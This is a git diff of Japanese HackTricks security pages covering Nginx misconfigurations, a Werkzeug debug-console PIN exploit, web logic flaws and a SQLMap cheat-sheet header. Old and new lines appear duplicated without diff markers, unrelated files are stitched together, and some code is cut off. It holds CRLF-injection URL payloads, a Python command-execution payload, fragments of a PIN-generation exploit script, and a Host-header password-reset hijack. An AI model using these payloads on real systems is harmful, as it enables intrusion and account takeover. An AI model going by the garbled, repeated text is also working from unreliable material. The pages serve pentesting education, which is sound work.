HTTPリクエストにおいて、文字 \r (キャリッジリターン) と \n (ラインフィード) は新しい行の文字を示し、そのURLエンコード形式は `%0d%0a` として表されます。これらの文字をリクエストに含めると (例: `http://localhost/%0d%0aDetectify:%20clrf`)、誤って設定されたサーバーは `Detectify` という新しいヘッダーを発行します。これは、$uri 変数がURLエンコードされた新しい行の文字をデコードするため、レスポンスに予期しないヘッダーが含まれることになります:
```
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.19.3
@ -117,9 +117,9 @@ CRLFインジェクションとレスポンススプリッティングのリス
* `https://example.com/%20X` - 任意のHTTPコード
* `https://example.com/%20H` - 400 Bad Request
脆弱な場合、最初のリクエストは「X」として返され、これは任意のHTTPメソッドです。2番目はHが有効なメソッドではないため、エラーを返します。したがって、サーバーは次のようなものを受け取ります:`GET / H HTTP/1.1`これがエラーを引き起こします。
脆弱な場合、最初のリクエストは「X」として返され、任意のHTTPメソッドが使用され、2番目はHが有効なメソッドではないためエラーが返されます。したがって、サーバーは次のようなものを受け取ります:`GET / H HTTP/1.1` これがエラーを引き起こします。
の検出例は次のとおりです:
の検出例は次のとおりです:
* `http://company.tld/%20HTTP/1.1%0D%0AXXXX:%20x` - 任意のHTTPコード
* `http://company.tld/%20HTTP/1.1%0D%0AHost:%20x` - 400 Bad Request
@ -132,7 +132,7 @@ location ^~ /lite/api/ {
proxy_pass http://lite-backend$uri$is_args$args;
}
```
* 再**`$uri`**がURLに含まれていることに注意してください今回はパラメータ内です
* 再**`$uri`**がURLに含まれていることに注意してください今回はパラメータ内です
```
location ~ ^/dna/payment {
rewrite ^/dna/([^/]+) /registered/main.pl?cmd=unifiedPayment&context=$1&native_uri=$uri break;
@ -148,17 +148,17 @@ proxy_pass https://company-bucket.s3.amazonaws.com$uri;
**ユーザー提供データ**が特定の状況下で**Nginx変数**として扱われる可能性があることが発見されました。この動作の原因はやや不明ですが、珍しいことではなく、確認するのも簡単ではありません。この異常はHackerOneのセキュリティレポートで強調されており、[こちら](https://hackerone.com/reports/370094)で見ることができます。エラーメッセージのさらなる調査により、[NginxのコードベースのSSIフィルターモジュール](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365)内での発生が特定され、サーバーサイドインクルードSSIが根本的な原因であることが明らかになりました。
この**誤設定を検出するために**、変数の印刷をテストするためにリファラーヘッダーを設定するコマンドを実行できます:
この**誤設定を検出するために**、変数の印刷をテストするためにリファラーヘッダーを設定する以下のコマンドを実行できます:
```bash
$ curl -H Referer: bar http://localhost/foo$http_referer | grep foobar
```
この設定ミスに関するスキャンは、ユーザーによってNginx変数が印刷される複数のインスタンスを明らかにしました。しかし、脆弱なインスタンスの数の減少は、この問題を修正するための努力がある程度成功していることを示唆しています。
この設定に関するスキャンは、ユーザーによってNginx変数が印刷される複数のインスタンスを明らかにしました。しかし、脆弱なインスタンスの数の減少は、この問題を修正するための努力がある程度成功していることを示唆しています。
## 生のバックエンドレスポンスの読み取り
Nginxは、バックエンドによって生成されたエラーやHTTPヘッダーを傍受するための機能を`proxy_pass`を通じて提供し、内部エラーメッセージやヘッダーを隠すことを目的としています。これは、Nginxがバックエンドエラーに応じてカスタムエラーページを提供することによって実現されます。しかし、Nginxが無効なHTTPリクエストに遭遇すると、課題が生じます。そのようなリクエストは、受信した通りにバックエンドに転送され、バックエンドの生のレスポンスはNginxの介入なしにクライアントに直接送信されます。
uWSGIアプリケーションに関する例を考えてみましょう
uWSGIアプリケーションに関する例のシナリオを考えてみましょう:
```python
def application(environ, start_response):
start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')])
@ -172,16 +172,16 @@ proxy_intercept_errors on;
proxy_hide_header Secret-Header;
}
```
* [**proxy\_intercept\_errors**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors): このディレクティブは、Nginxが300より大きいステータスコードのバックエンドレスポンスに対してカスタムレスポンスを提供できるようにします。これにより、例として挙げたuWSGIアプリケーションに対して、`500 Error`レスポンスがNginxによってインターセプトされ、処理されることが保証されます。
* [**proxy\_hide\_header**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header): 名前が示すように、このディレクティブは指定されたHTTPヘッダーをクライアントから隠し、プライバシーとセキュリティを向上させます。
* [**proxy\_intercept\_errors**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors): このディレクティブは、Nginxがステータスコードが300を超えるバックエンドレスポンスに対してカスタムレスポンスを提供できるようにします。これにより、例として挙げたuWSGIアプリケーションに対して、`500 Error`レスポンスがNginxによってインターセプトされ、処理されることが保証されます。
* [**proxy\_hide\_header**](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header): 名前が示すように、このディレクティブは指定されたHTTPヘッダーをクライアントから隠し、プライバシーとセキュリティを強化します。
有効な`GET`リクエストが行われると、Nginxは通常通り処理し、秘密のヘッダーを明らかにすることなく標準のエラーレスポンスを返します。しかし、無効なHTTPリクエストはこのメカニズムをバイパスし、生のバックエンドレスポンスが露出し、秘密のヘッダーやエラーメッセージが含まれる結果となります。
## merge\_slashesをオフに設定
デフォルトでは、Nginxの**`merge_slashes`ディレクティブ**は**`on`**に設定されており、URL内の複数のスラッシュを1つのスラッシュに圧縮します。この機能はURL処理を簡素化しますが、Nginxの背後にあるアプリケーションの脆弱性、特にローカルファイルインクルージョンLFI攻撃に対して無意識のうちに隠蔽する可能性があります。セキュリティ専門家の**ダニー・ロビンソン****ロテム・バー**は、このデフォルトの動作に関連する潜在的なリスクを指摘しています。特にNginxがリバースプロキシとして機能する場合です。
デフォルトでは、Nginxの**`merge_slashes`ディレクティブ**は**`on`**に設定されており、URL内の複数のスラッシュを1つのスラッシュに圧縮します。この機能はURL処理を簡素化しますが、特にローカルファイルインクルージョンLFI攻撃に対して脆弱なアプリケーションの背後にあるNginxでの脆弱性を隠す可能性があります。セキュリティ専門家の**ダニー・ロビンソンとロテム・バー**は、このデフォルトの動作に関連する潜在的なリスクを指摘しています。特にNginxがリバースプロキシとして機能する場合です。
このようなリスクを軽減するために、これらの脆弱性に対して感受性のあるアプリケーションでは**`merge_slashes`ディレクティブをオフにする**ことが推奨されます。これにより、NginxはURL構造を変更することなくアプリケーションにリクエストを転送し、基盤となるセキュリティ問題を隠さないようにします。
このようなリスクを軽減するために、これらの脆弱性に対して感受性のあるアプリケーションに対して**`merge_slashes`ディレクティブをオフにする**ことが推奨されます。これにより、NginxはURL構造を変更することなくアプリケーションにリクエストを転送し、基盤となるセキュリティ問題を隠さないようにします。
詳細については、[ダニー・ロビンソンとロテム・バー](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d)を確認してください。
@ -259,12 +259,12 @@ deny all;
}
```
{% hint style="warning" %}
注意してください。`proxy_pass`が`http://backend:9999/socket.io`のような特定の**パス**を指していても、接続は`http://backend:9999`で確立されるため、**その内部エンドポイント内の他のパスに連絡することができます。したがって、proxy_passのURLにパスが指定されていても関係ありません。**
`proxy_pass``http://backend:9999/socket.io` のような特定の **path** を指していても、接続は `http://backend:9999`確立されるため、**その内部エンドポイント内の他のパスに連絡することができます。したがって、proxy_pass URL にパスが指定されていても関係ありません。**
{% endhint %}
## 自分で試してみる
Detectifyは、Dockerを使用して、この記事で説明したいくつかの誤設定を持つ脆弱なNginxテストサーバーを自分でセットアップできるGitHubリポジトリを作成しました。自分で見つけてみてください!
Detectify は、Docker を使用してこの記事で説明されているいくつかの誤設定を持つ脆弱な Nginx テストサーバーをセットアップできる GitHub リポジトリを作成しました。自分で見つけてみてください!
[https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx)
@ -272,11 +272,11 @@ Detectifyは、Dockerを使用して、この記事で説明したいくつか
### [GIXY](https://github.com/yandex/gixy)
GixyはNginxの設定を分析するツールです。Gixyの主な目的は、セキュリティの誤設定を防ぎ、欠陥の検出を自動化することです。
Gixy は Nginx 設定を分析するツールです。Gixy の主な目的は、セキュリティの誤設定を防ぎ、欠陥の検出を自動化することです。
### [Nginxpwner](https://github.com/stark0de/nginxpwner)
Nginxpwnerは、一般的なNginxの誤設定や脆弱性を探すためのシンプルなツールです。
Nginxpwner は、一般的な Nginx の誤設定や脆弱性を探すためのシンプルなツールです。
## 参考文献
@ -284,23 +284,23 @@ Nginxpwnerは、一般的なNginxの誤設定や脆弱性を探すためのシ
* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らに深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らに深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
AWSハッキングを学び、実践する<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWS ハッキングを学び、実践する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP ハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricksをサポートする</summary>
<summary>HackTricks をサポートする</summary>
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
* **💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f) または [**Telegram グループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を送信してください。**
</details>
{% endhint %}

View file

@ -9,15 +9,15 @@ GCPハッキングを学び、実践する: <img src="/.gitbook/assets/grte.png"
<summary>HackTricksをサポートする</summary>
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまでの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出およびエクスプロイトモジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで対応しています。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出およびエクスプロイトモジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -33,7 +33,7 @@ __import__('os').popen('whoami').read();
## ピン保護 - パス・トラバーサル
場合によっては、**`/console`** エンドポイントがピンで保護されることがあります。**ファイルトラバーサル脆弱性**がある場合、そのピンを生成するために必要な情報をすべて漏洩させることができます。
場合によっては、**`/console`** エンドポイントがピンで保護されることがあります。**ファイルトラバーサル脆弱性**がある場合、そのピンを生成するために必要なすべての情報を漏洩させることができます。
### Werkzeug コンソール PIN エクスプロイト
@ -111,7 +111,7 @@ try:
必要なデータをすべて収集した後、エクスプロイトスクリプトを実行してWerkzeugコンソールPINを生成できます。
必要なデータをすべて収集した後、エクスプロイトスクリプトを実行してWerkzeugコンソールPINを生成できます。スクリプトは、組み立てられた`probably_public_bits`と`private_bits`を使用してハッシュを作成し、その後さらに処理を行って最終的なPINを生成します。以下は、このプロセスを実行するためのPythonコードです
必要なデータをすべて収集した後、エクスプロイトスクリプトを実行してWerkzeugコンソールPINを生成できます。スクリプトは、組み立てられた`probably_public_bits`と`private_bits`を使用してハッシュを作成し、その後、最終的なPINを生成するためにさらに処理されます。以下は、このプロセスを実行するためのPythonコードです
```python
import hashlib
from itertools import chain
@ -157,17 +157,17 @@ rv = num
print(rv)
```
このスクリプトは、連結されたビットをハッシュ化し、特定のソルト(`cookiesalt` と `pinsalt`を追加し、出力をフォーマットすることでPINを生成します。`probably_public_bits` と `private_bits` の実際の値は、生成されたPINがWerkzeugコンソールで期待されるものと一致するように、ターゲットシステムから正確に取得する必要があることに注意することが重要です
このスクリプトは、連結されたビットをハッシュ化し、特定のソルト(`cookiesalt` と `pinsalt`を追加し、出力をフォーマットすることでPINを生成します。`probably_public_bits` と `private_bits` の実際の値は、生成されたPINがWerkzeugコンソールで期待されるものと一致するように、ターゲットシステムから正確に取得する必要があることに注意してください
{% hint style="success" %}
古いバージョンのWerkzeugを使用している場合は、ハッシュアルゴリズムをsha1の代わりに**md5に変更**してみてください。
**古いバージョン**のWerkzeugを使用している場合は、**ハッシュアルゴリズムをsha1の代わりにmd5に変更**してみてください。
{% endhint %}
## Werkzeug Unicode文字
[**この問題**](https://github.com/pallets/werkzeug/issues/2833)で観察されたように、WerkzeugはヘッダーにUnicode文字が含まれるリクエストを閉じません。そして、[**この解説**](https://mizu.re/post/twisty-python)で説明されているように、これによりCL.0リクエストスムーングの脆弱性が発生する可能性があります。
[**この問題**](https://github.com/pallets/werkzeug/issues/2833)で観察されたように、WerkzeugはヘッダーにUnicode文字が含まれるリクエストを閉じません。そして、[**この解説**](https://mizu.re/post/twisty-python)で説明されているように、これによりCL.0リクエストスムーングの脆弱性が発生する可能性があります。
これは、Werkzeugではいくつかの**Unicode**文字を送信することが可能であり、それがサーバーを**壊す**ことになるからです。しかし、HTTP接続が**`Connection: keep-alive`**ヘッダーで作成された場合、リクエストのボディは読み取られず、接続はまだオープンのままになるため、リクエストの**ボディ**は**次のHTTPリクエスト**として扱われます。
これは、Werkzeugではいくつかの**Unicode**文字を送信することが可能であり、それがサーバーを**壊す**ことになるからです。しかし、HTTP接続が**`Connection: keep-alive`**ヘッダーで作成された場合、リクエストのボディは読み取られず、接続はまだオープンのままとなり、リクエストの**ボディ**は**次のHTTPリクエスト**として扱われます。
## 自動化された悪用
@ -180,9 +180,9 @@ print(rv)
* [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
* [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らに深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らに深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -195,8 +195,8 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
<summary>HackTricksをサポートする</summary>
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で**フォロー**してください 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**フォロー**してください 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
{% endhint %}

View file

@ -1,42 +1,42 @@
# Other Web Tricks
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWSハッキングを学び、実践する<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
<summary>HackTricksをサポートする</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
### Host header
バックエンドが**Host header**を信頼していくつかのアクションを実行することが何度かあります。たとえば、パスワードリセットを送信する**ドメインとしてその値を使用する**ことがあります。したがって、パスワードをリセットするためのリンクを含むメールを受け取ったとき、使用されるドメインはHost headerに入力したものです。その後、他のユーザーのパスワードリセットを要求し、ドメインをあなたが制御するものに変更して、彼らのパスワードリセットコードを盗むことができます。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
バックエンドが**Host header**を信頼していくつかのアクションを実行することが何度かあります。たとえば、パスワードリセットを送信するための**ドメインとしてその値を使用する**ことがあります。したがって、パスワードをリセットするためのリンクを含むメールを受け取ったとき、使用されるドメインはHost headerに入力したものです。その後、他のユーザーのパスワードリセットをリクエストし、ドメインをあなたが制御するものに変更して、彼らのパスワードリセットコードを盗むことができます。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
{% hint style="warning" %}
ユーザーがリセットパスワードリンクをクリックするのを待つ必要がない場合もあることに注意してください。おそらく**スパムフィルターや他の中間デバイス/ボットがそれをクリックして分析するでしょう**。
ユーザーがリセットパスワードリンクをクリックするのを待つ必要がない場合もあることに注意してください。おそらく**スパムフィルターや他の中間デバイス/ボットがそれをクリックして分析する**ためです
{% endhint %}
### Session booleans
時々、いくつかの検証を正しく完了すると、バックエンドは**セッションのセキュリティ属性に「True」という値のブール値を追加するだけです**。その後、別のエンドポイントは、あなたがそのチェックに成功したかどうかを知ることができます。\
しかし、もしあなたが**チェックに合格し**、セッションがそのセキュリティ属性に「True」値を付与された場合、あなたは**同じ属性に依存する他のリソースにアクセスしようとすることができますが、アクセスする権限はないはずです**。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
時々、いくつかの検証を正しく完了すると、バックエンドは**セキュリティ属性に「True」という値のブール値を追加するだけです**。その後、別のエンドポイントは、あなたがそのチェックに成功したかどうかを知ることができます。\
しかし、もしあなたが**チェックに合格し**、セキュリティ属性に「True」値が付与された場合、あなたは**同じ属性に依存する他のリソースにアクセスしようとすることができますが、アクセスする権限はないはずです**。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
### Register functionality
既存のユーザーとして登録してみてください。また、同等の文字ドット、たくさんのスペース、Unicodeを使用してみてください。
既存のユーザーとして登録を試みてください。また、同等の文字ドット、たくさんのスペース、Unicodeを使用してみてください。
### Takeover emails
@ -53,23 +53,23 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWSハッキングを学び、実践する<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
<summary>HackTricksをサポートする</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>
{% endhint %}

View file

@ -1,8 +1,8 @@
# SQLMap - チートシート
{% hint style="success" %}
AWSハッキングを学び、実践する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWSハッキングを学び、練習する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、練習する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -15,9 +15,9 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまでの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出およびエクスプロイトモジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
